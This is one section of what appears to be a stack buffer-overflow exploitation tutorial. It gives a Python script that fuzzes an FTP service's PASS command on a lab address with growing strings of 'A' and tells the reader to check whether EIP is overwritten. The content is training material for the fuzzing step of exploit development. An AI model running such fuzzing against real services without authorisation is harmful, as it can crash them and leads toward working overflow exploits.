4. Fuzzing

The following Python script can be modified and used to fuzz remote entry points to an application. It will send increasingly long buffer strings in the hope that one eventually crashes the application.

import socket, time, sys

ip = "10.0.0.1"
port = 21
timeout = 5

# Create an array of increasing length buffer strings.
buffer = []
counter = 100
while len(buffer) < 30:
	buffer.append("A" * counter)
	counter += 100

for string in buffer:
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.settimeout(timeout)
		connect = s.connect((ip, port))
		s.recv(1024)
		s.send("USER username\r\n")
		s.recv(1024)

		print("Fuzzing PASS with %s bytes" % len(string))
		s.send("PASS " + string + "\r\n")
		s.recv(1024)
		s.send("QUIT\r\n")
		s.recv(1024)
		s.close()
	except:
		print("Could not connect to " + ip + ":" + str(port))
		sys.exit(0)
	time.sleep(1)

Note that, we need to change send command to the command that we spiked and its format will be identified by seeing the EAX register in the previous step (spiking). Also add or remove recv commands according to the messages that the commands send

Finally run this script and check that the EIP register has been overwritten by A's (\x41). Make a note of any other registers that have either been overwritten, or are pointing to space in memory which has been overwritten.

Previous3. Spiking Next5. Crash Replication & Controlling EIP

Last updated 2 years ago